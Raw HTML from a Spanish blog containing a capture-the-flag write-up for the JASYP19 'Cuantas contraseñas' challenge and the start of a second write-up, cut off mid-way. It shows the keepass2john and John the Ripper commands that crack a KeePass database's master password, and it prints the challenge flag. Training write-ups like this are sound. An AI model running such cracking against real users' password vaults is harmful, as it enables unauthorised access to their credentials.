<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Angel Pablo Aviles</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Lorenzo Martinez</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">IES Brianda de Mendoza</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Hack and Beers </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Yolanda Corral Murcia</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">OXWORD</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Irlandes Errante</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Josep Albors</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: #201c1d; font-family: Arial; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><div dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #201c1d; font-family: "arial"; font-size: 13pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Cervezas Arriaca </span></div>
</li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Gracias a todos ellos por su colaboración.</span></div>
<br />Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0Guadalajara, Spain40.632489 -3.160169999999993740.5842875 -3.2408509999999939 40.6806905 -3.0794889999999935tag:blogger.com,1999:blog-4789894782637921835.post-81258234032893951142019-06-17T08:51:00.000+02:002019-06-17T08:52:21.699+02:00WRITEUP - JASYP19 - Challenges - Cuantas contraseñas - 1v4n<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Descripción</span></div>
<b id="docs-internal-guid-7192e365-7fff-f941-c9c2-3e4565f7606e" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Nombre:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Cuantas contraseñas (</span><a href="https://ctf.interferencias.tech/challenges#Cuantas%20contrase%C3%B1as" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://ctf.interferencias.tech/challenges#Cuantas%20contrase%C3%B1as</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> )</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Fecha de liberación:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> 26 de abril de 2019</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Autor: </span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Inter_ferencias (</span><a href="https://twitter.com/inter_ferencias" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://twitter.com/inter_ferencias</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> ) y #HackingDesdeCero (</span><a href="https://twitter.com/hashtag/hackingdesdecero" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://twitter.com/hashtag/hackingdesdecero</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">) </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Dificultad:</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> Bajo-Medio</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Objetivo</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Formato de flag: JASYP{flag}</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="254" src="https://lh4.googleusercontent.com/Bsqbub48Frxcn_bN676hcEHyJnCig_721W01blWs7dEK5QA-1VQhcTYUd7Jesj4mqCdvREQd1hcugjWz59SsoFlDzc5zNeC_1ZXBPdCtJLZesPqiHy3Vx4cEr0cZO2IPHfbS3E4J" style="border: none;" width="363" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Herramientas utilizadas</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Firefox Version 60.7.0 </span><a href="https://www.mozilla.org/en-US/firefox/60.7.0/releasenotes/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.mozilla.org/en-US/firefox/60.7.0/releasenotes/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">John the Ripper 1.9.0-jumbo-1 </span><a href="http://www.openwall.com/john/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">http://www.openwall.com/john/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">keepass2 2.41 </span><a href="https://pkg.kali.org/pkg/keepass2" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://pkg.kali.org/pkg/keepass2</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Resumen:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Descargamos a través del link en la parte inferior izquierda de la pantalla el archivo llamado</span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><a href="https://github.com/1r0dm480/CTF-Wr1T3uPs/blob/master/JASYPCTF19/forensic/cuantas_contrase%C3%B1as/NewDatabase.kdbx" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">NewDatabase.kdbx</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"> (411d3c16328957a8d107da30392fcd4a)</span><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> y pasamos a realizar un análisis preliminar:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/JASYPCTF2019/forensic/cuantascontra</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># file NewDatabase.kdbx</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">NewDatabase.kdbx: Keepass password database 2.x KDBX</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/JASYPCTF2019/forensic/cuantascontra</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># md5sum NewDatabase.kdbx</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">411d3c16328957a8d107da30392fcd4a NewDatabase.kdbx</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">root@1v4n:~/CTF/JASYPCTF2019/forensic/cuantascontra</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: "consolas" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"># keepass2 NewDatabase.kdbx</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="177" src="https://lh3.googleusercontent.com/88ryg80AXsiDlKPKG-NMEIAz_ofBqx-sjXiIAWjYqcaxfEXv2w-5r48YD27N_PJGg-k7lHS-OPfbyIjpaupDMAUiXEX4nwwhAJTC6Yl0hz6tLX4AdtZ4I1fj_x5rR-9LUKmZPx3D" style="border: none;" width="320" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Rompimos la contraseña con JtR para abrir la contraseña de la Base de datos de contraseñas de </span><br />
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Keepass (</span><a href="https://keepass.info/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://keepass.info/</span></a><span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">keepass2john NewDatabase.kdbx > Crack.hash && john -format=keepass Crack.hash > </span><br />
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">output && john --show Crack.hash > output && cat output</span><br />
<span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">NewDatabase:admin</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">1 password </span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">hash</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: "consolas" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> cracked, 0 left</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="241" src="https://lh5.googleusercontent.com/sIIm-CREk5UYv3LpYdUFEv0H80z5qSmcl4NzHa5E6q1ydp__eiGuPfDAIeBkzsuwVVWnL3FNTL3U9JU7RWKs6jGYN457s_PSS7P_wY9QEOl_9bzjlxAwJipUvL7xMIS7i5yApxNn" style="border: none;" width="320" /></span></div>
<b style="font-weight: normal;"><br /><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Y ahí está la flag es: </span><span style="background-color: #cccccc; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">JASYP{32d32c45d8a5141612c6db7313e83486}</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #cccccc; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Encontró : Hola caracola</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #cccccc; color: black; font-family: "calibri" , sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">(hash = 32d32c45d8a5141612c6db7313e83486)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: #cccccc; color: black; font-family: "calibri" , sans-serif; font-size: 10pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="320" src="https://lh3.googleusercontent.com/qOys707GQuu7qjNK5zOof4sXpcC-xIrUVypKQJY4sLD5fiFAvDcxtIfpAcpRNIFV3Cm3DTJEBjTuM18ilNODd1zPqDHDqcNTsPVyphIscK35wsXWVO5eHFatLqpNmaEFIC_LyNgU" style="border: none;" width="299" /></span></div>
<br />
<br />
<br />
<br />
<span style="font-family: "calibri" , sans-serif; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Autor: 1v4n a.k.a. @1r0Dm448O</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="font-family: "calibri" , sans-serif; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">Twitter: </span><a href="https://twitter.com/1r0Dm448O" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "calibri" , sans-serif; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">https://twitter.com/1r0Dm48O</span></a>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com019180 Marchamalo, Guadalajara, Spain40.6678056 -3.201819800000066640.6557616 -3.2219898000000664 40.679849600000004 -3.1816498000000668tag:blogger.com,1999:blog-4789894782637921835.post-33657648465291400212019-05-29T07:42:00.000+02:002019-05-29T07:53:45.243+02:00Writeup: CSACTF19 - Challenges - stephanography - 1v4n<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="-webkit-text-decoration-skip: none; background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Descripción</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Nombre:</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> </span><span style="background-color: white; color: #24292e; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">stephanography</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> (</span><a href="https://ctf.utsacyber.com/challenges#stephanography" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://ctf.utsacyber.com/challenges#stephanography</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> )</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Fecha de liberación:</span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> 25 de abril de 2019</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Autor: </span><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">53cur17y4f73rh0ur5 (</span><a href="https://ctftime.org/team/46502" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">https://ctftime.org/team/46502</span></a><span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">)</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
